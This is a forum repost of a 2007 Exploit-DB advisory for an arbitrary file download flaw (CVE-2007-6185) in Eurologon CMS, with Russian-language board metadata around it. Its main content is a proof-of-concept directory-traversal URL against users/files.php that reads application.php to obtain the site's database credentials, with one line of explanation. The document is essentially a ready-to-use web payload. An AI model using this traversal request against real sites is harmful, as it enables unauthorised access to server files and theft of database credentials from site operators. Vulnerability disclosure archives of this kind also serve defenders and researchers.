Exploit Eurologon CMS - 'files.php' Arbitrary File Download

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4666
Проверка EDB
  1. Пройдено
Автор
KINGOFTHEWORLD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-6185
Дата публикации
2007-11-27
Код:
---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

Eurologon CMS Db credentials disclosure / files download

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

The download module, not correctly check the file parameter, then using 
directory traversal we can get all the files hosted in our target web space.
---------------------------------------------------------------
Get Database Credentials

http://[target]/users/files.php?mode=download&file=../../application.php
---------------------------------------------------------------

# milw0rm.com [2007-11-27]
 
Источник
www.exploit-db.com

Похожие темы